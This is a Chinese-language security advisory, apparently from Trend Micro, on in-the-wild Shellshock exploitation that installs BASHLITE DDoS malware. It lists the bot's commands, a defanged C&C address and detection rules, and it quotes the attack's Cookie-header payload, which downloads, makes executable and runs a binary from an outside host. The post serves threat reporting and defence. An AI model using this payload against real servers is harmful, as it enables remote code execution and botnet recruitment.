在Shellshock/bash 漏洞(包含在CVE-2014-7169)新聞爆發後短短幾個小時就出現了真實的漏洞攻擊事件。這一個漏洞可以讓人執行任意程式碼,從而影響系統安全。攻擊者可能做出的包括變更網站內容和網站程式碼、污損網站外貌,甚至是從資料庫竊取使用者資料以及其他更多事情。
趨勢科技發現了真實漏洞攻擊碼所帶來惡意軟體的樣本。偵測為ELF_BASHLITE.A(也被稱為ELF_FLOODER.W),此惡意軟體可以發動分散式阻斷服務(DDoS)攻擊。它所會執行的指令包括有:
- PING
- GETLOCALIP
- SCANNER
- HOLD 暫停或是延後攻擊一給定時間
- JUNK 垃圾洪水攻擊
- UDP 用UDP封包做分散式阻斷服務攻擊
- TCP 用TCP封包做分散式阻斷服務攻擊
- KILLATTK – 終止攻擊執行緒
- LOLNOGTFO – 終止僵屍機器人
它也可以做到暴力法登入,讓攻擊者可以取得登入使用者和密碼的列表。根據我們的分析,ELF_BASHLITE.A也會連到 C&C伺服器 – 89[點]238[點]150[點]154[冒號]5。
圖1、威脅感染示意圖(點入以看大圖)
下面是用來帶入惡意軟體進到系統的程式碼:
Cookie:().{.:;.};.wget.-O./tmp/besh.https://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;
如同我們稍早發布的文章所討論過,此漏洞的嚴重性相當巨大,因為主要受影響的是網頁伺服器。它(此漏洞)也對萬物聯網(IoE ,Internet of Everything)設備帶來風險,因為用的是Linux(內含Bash)。據說它也影響到了比特幣(Bitcoin)/比特幣採礦,因此攻擊者很有可能會透過此途徑來建立起「Botnet傀儡殭屍網路」機器人大軍。
趨勢科技主動式雲端截毒服務 Smart Protection Network可以保護使用者免於上面所提到的BASHLITE變種威脅。我們會繼續觀察是否有其他漏洞攻擊針對此弱點。
透過網路來對Shellshock漏洞進行攻擊的企圖可以透過下列Deep Discovery規則偵測到:
- 1618 – Shellshock HTTP REQUEST
其他趨勢科技產品(趨勢科技的OSCE、IWSVA和PC-cillin)都可以將此網路行為偵測為CVE-2014-6271-SHELLSHOCK_REQUEST。
此外,趨勢科技的Deep Security可以透過以下DPI規則來保護使用者免於此Bash漏洞威脅:
- 1006256 – GNU Bash Remote Code Execution Vulnerability
其他想要檢查自己是否受到影響的使用者可以查看我們的Shellshock免費防護。想知道更多可能的Shellshock漏洞攻擊情景,請參考我們的文章 – Shellshock – 它有多嚴重?
此次攻擊的相關雜湊值是0229e6fa359bce01954651df2cdbddcdf3e24776。
@原文出處:Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware
趨勢科技會持續提供關於此漏洞的更新,使用者可以的到這裡來獲得最新資訊。
